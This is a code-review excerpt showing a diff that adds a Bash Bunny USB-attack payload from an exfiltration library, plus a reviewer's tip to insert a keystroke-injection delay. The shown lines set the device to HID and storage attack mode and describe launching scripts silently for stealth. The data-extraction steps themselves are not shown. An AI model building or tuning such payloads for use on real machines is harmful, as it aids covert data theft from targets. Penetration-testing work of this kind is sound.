payloads/library/exfiltration/improved-usb-extractor/payload.txt

```diff
@@ -0,0 +1,11 @@
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+GET SWITCH_POSITION
+LED ATTACK
+ATTACKMODE HID STORAGE
+
+# For improved stealth, if target supports Visual Basic Script, change the
+# launch line below to launch z.cmd instead of x.cmd.
+# Documentation line from original project:
+# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
```

Comment:
I would add short delay before running any keystroke injection so the the target machine has the time to identify and accept keystrokes from the bash bunny. 


simply add 
```
QUACK DELAY 1000
```
before line 10